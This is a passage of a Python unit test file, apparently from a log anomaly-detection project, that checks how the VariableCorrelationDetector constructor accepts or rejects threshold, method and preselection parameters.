VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=-1) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=-1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=-1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="SomethingElse") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="Chi") VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="MaxDist") self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["matchDiscDistr"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["excludeDueDistr"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["matchDiscVals"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["random"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=b"True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth="True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=True) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=1.1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.1) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.99) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, exclude_due_distr_lower_limit=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_distr_threshold=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["Rel"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_cor_meth=["WRel"]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=["coverVals"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_validate_cor_meth=["distinctDistr"]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_cover_vals_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 